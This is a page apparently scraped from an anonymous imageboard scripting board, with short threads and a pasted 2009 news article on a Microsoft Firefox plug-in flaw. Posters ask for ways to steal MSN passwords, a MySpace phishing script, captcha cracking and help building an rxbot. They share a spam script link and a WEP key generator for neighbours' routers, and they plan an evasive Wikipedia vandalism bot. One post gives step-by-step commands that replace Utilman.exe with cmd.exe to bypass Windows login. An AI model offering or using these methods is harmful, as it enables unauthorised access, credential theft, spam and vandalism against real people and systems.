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121 No. 121 hide watch expand quickreply [Reply]
Is there any way to steal someone's msn password?

(why in the love of FUCK would you ask that in a scripting board?)
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>> No. 229
BEEKEEPER
>> No. 242
Is there msn any to steal script someone's password?
>> No. 264
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>>121
>Is there any way to steal someone's msn password?
Go to your victim's screen. Read the notes attached to it.


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256 No. 256 hide watch quickreply [Reply]
So here's the deal. Recently the idea has come up to do a google insite:wikipedia.org for "accidentally", then delete the following word from everything that comes up. There are litterally 10's of 1000's of instances. What would be involved in coding a bot to do it? Obviously there are wikibots (sinebot, etc), but what are they coded in and how do you implement them? Distributing this bot to a couple hundred anons would be hilarious.
>> No. 258
op here. Found a decent php bot that should make for a good starting point. Gonna try and do this up tomorrow.
>> No. 261
only problem is there's no way to hide it, it'll show up as a storm of minor edits and the admins will ban everyone and roll everything back.

or were you planning to run it really slow? that might work... well i like it i guess

maybe have it watch the change log until you can see a pattern and edit on a page nobody's touched in a while when there's lots of stuff going on elsewhere


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253 No. 253 hide watch quickreply [Reply]
Looking for a myspace phishing script. Previous thread in this forum has one, however, the link expired.


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239 No. 239 hide watch quickreply [Reply]
Use the following in a Backtrack 3 Konsole:

cd /mnt
ls
sda1/

cd sda1 ( Not always sda1, whichever windows is install in, duh. )

cd Windows/
cd System32/
mv Utilman.exe Utilman.old
cp cmd.exe Utilman.exe
reboot

Works on anything that has utility manager in it. Meaning: 2000, XP, Vista, AND 7.
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>> No. 249
old trick is old.
reported to microsoft in the late 90's and they said it wasnt an issue lol.
can do the same thing with sethc.exe (stickykeys)
>> No. 251
If you can sit down at a Windows box it's not going to take anything fancy to get into it. Well, unless they encrypted the disk.


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238 No. 238 hide watch quickreply [Reply]
Hey guys, do any of you know how to bypass a securimage captcha? working on a new version of a script, however, is there any way I could implement a script that cracks the captcha? Inb4 google, I already looked.
>> No. 243
There's actually a project out there where these bunch of guys have created a program which is able to regonize the characters written on the capatcha. But I don't remember the projects name anymore, So keep on googling.
>> No. 244
I found one called "pwntcha", however this does not crack securimage captchas.


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232 No. 232 hide watch quickreply [Reply]
so /sc/, say hypothetically i decided to try my hand at making an rxbot, and after getting everything set up i got to the part where i had to dl Microsoft SDK, and i keep getting problems with windns.h (which i haven't altered)

D:\PROGRAM FILES\MICROSOFT SDKS\WINDOWS\V6.1\INCLUDE\windns.h(1694) : warning C4229: anachronism used : modifiers on data are ignored
D:\PROGRAM FILES\MICROSOFT SDKS\WINDOWS\V6.1\INCLUDE\windns.h(1700) : error C2059: syntax error : ')'
>> No. 241
hypothetically.


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Sneaky Microsoft plug-in puts Firefox users at risk
Patches critical bug, exploitable because of add-on silently slipped into Firefox last February

Gregg Keizer


October 16, 2009 (Computerworld) An add-on that Microsoft silently slipped into Mozilla's Firefox last February leaves the browser open to attack, Microsoft's security engineers acknowledged earlier this week.

One of the 13 security bulletins Microsoft released Tuesday affects not only Internet Explorer (IE), but also Firefox, thanks to a Microsoft-made plug-in pushed to Firefox users eight months ago in an update delivered via Windows Update.

"While the vulnerability is in an IE component, there is an attack vector for Firefox users as well," admitted Microsoft engineers in a tweet to the company's Security Research & Defense blog on Tuesday. "The reason is that .NET Framework 3.5 SP1 installs a 'Windows Presentation Foundation' plug-in in Firefox."

The Microsoft engineers described the possible threat as a "browse-and-get-owned" situation that only requires attackers to lure Firefox users to a rigged Web site.

Numerous users and experts complained when Microsoft pushed the .NET Framework 3.5 Service Pack 1 (SP1) update to users last February, including Susan Bradley, a contributor to the popular Windows Secrets newsletter.
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>> No. 234
>Does this mean No Script wont work on FF?

what does this have to do with NoScript?

By the way, the addon/plugins that did this are already blacklisted by mozilla, a blacklisting function in firefox they haven't had to use more than what 7 or 9 times since they created it.


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231 No. 231 hide watch quickreply [Reply]
http://anonym.to/http://sharebee.com/e3154beb
emailspam.pl

Enjoy


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146 No. 146 hide watch expand quickreply [Reply]
hi
I have a generator utility that lets me put in the 6 digit number witch i can get from Acatel Speedtouch SSID's
Example, Your neighbor has a wifi named speedtouch56A8E4
then i give the code to the generator(56A8E4) and it generates the wep.

I will share if you dont have it.

In my area we have a lot of ZYXEL wifis and the SSIDð's look similar + the wep-code is on a sticker on the routers bottom like on the speedtouch.

I found a tweet that might contain info and files to build/compile a similar utility.

Can anyone help me make somthing out of this tweet:

http://anonym.to/http://anonym.to/?http://anonym.to/http://www.boards.ie/vbulletin/showthread.php?p=59260876
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>> No. 198
Where did you get that app anyway?
>> No. 213
>>164
Most ADSL routers from shitty ISPs still use WEP by default. But now you can easily crack a WEP key with aircrack-ng in like 15 minutes so I don't really see a point in using that 'generator'. But I wonder if it would work for other ISPs using SpeedTouch routers.
>> No. 226
if a person uses WEP, THEY DESERVE TO BE HACKED

i broke my neighbours net in 42 seconds :D


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#!/bin/sh
#ukill.sh - written to pwn compromised accounts
#kthx :)


ps -aufx | grep $1 | awk -F ' ' '{print "kill "$2}' > die.sh && sh die.sh && echo "All user processes killed\n"
netstat -pant | grep $1 | awk -F ' ' '{print $7}' | awk -F '\/' '{print "kill "$1}' > con.sh && sh con.sh
echo "All user's connections killed.\n"
echo "Enter new password for user\n\n"
passwd $1

echo "Ok, send an email to $1 telling him blahz."
>> No. 75
Sauce on your pic, OP? I don't care about your scr1pt, sorry.
>> No. 223
lame script. not useful in any circumstance, and does things ass backwards. if you're the user, you don't want to kill all your own processes. if you're someone else, you can't do it without being root.
the netstat is also redundant, btw, owned processes would have been killed in the first sweep, including processes owned
and -aufx and -pant don't work in GNU versions of utils. you want something like netstat -pate (no n, which will make your grep useless, and add e, which shows users)
ps could be -fu $1 or waux | grep $1

anyway, your script sucks.


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